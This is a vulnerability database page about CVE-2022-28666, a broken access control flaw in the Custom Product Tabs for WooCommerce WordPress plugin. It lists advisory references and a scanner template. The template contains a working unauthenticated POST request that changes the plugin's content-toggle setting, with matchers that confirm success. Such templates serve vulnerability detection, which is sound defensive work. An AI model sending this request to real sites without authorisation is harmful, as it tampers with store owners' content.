| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2022-28666 | 28 Jun 202213:19 | ā | attackerkb | |
| CVE-2022-28666 | 21 Jul 202220:18 | ā | circl | |
| WordPress plugin YIKES Inc. Custom Product Tabs for WooCommerce ęęé®é¢ę¼ę“ | 21 Jul 202200:00 | ā | cnnvd | |
| CVE-2022-28666 | 21 Jul 202216:59 | ā | cve | |
| CVE-2022-28666 WordPress Custom Product Tabs for WooCommerce plugin <= 1.7.7 - Broken Access Control vulnerability | 21 Jul 202216:59 | ā | cvelist | |
| EUVD-2022-33108 | 3 Oct 202520:07 | ā | euvd | |
| CVE-2022-28666 | 21 Jul 202217:15 | ā | nvd | |
| WordPress Custom Product Tabs for WooCommerce Plugin <= 1.7.7 Improper Authentication Vulnerability | 17 Aug 202300:00 | ā | openvas | |
| CVE-2022-28666 | 21 Jul 202217:15 | ā | osv | |
| WordPress Custom Product Tabs for WooCommerce plugin <= 1.7.7 - Broken Access Control vulnerability leading to &yikes-the-content-toggle option update | 28 Jun 202200:00 | ā | patchstack |
id: CVE-2022-28666
info:
name: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
author: Sourabh-Sahu
severity: medium
description: |
YIKES Inc. Custom Product Tabs for WooCommerce plugin \u003C= 1.7.7 contains a broken access control caused by improper permission checks in &yikes-the-content-toggle option update, letting attackers modify content without authorization.
impact: |
Attackers can modify product tab content without authorization, potentially leading to content tampering or misinformation.
remediation: |
Update to the latest version of the plugin, above 1.7.7.
reference:
- https://wpscan.com/vulnerability/2f20e14b-3a97-41c5-a3ce-054ed2450aa3/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2022-28666
epss-score: 0.01226
epss-percentile: 0.65162
cwe-id: CWE-287
cpe: cpe:2.3:a:yikesinc:custom_product_tabs_for_woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "yikes-inc-easy-custom"
tags: cve,cve2022,wordpress,wp-plugin,wp,custom_product_tabs_for_woocommerce,vkev,intrusive
http:
- raw:
- |
POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
toggle_the_content=false
matchers:
- type: dsl
dsl:
- "contains_all(body, 'success','Settings updated')"
- "contains(content_type, 'application/json')"
- "status_code == 200"
condition: and
# digest: 4a0a004730450221009a95f1621d4f7a9eda11040385cd5af4197794606361500ec115ad02dc50b78002205fc27fe93f993a921f11e3a40dc4b21264c3a383d68e253e350641c422b00b90:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation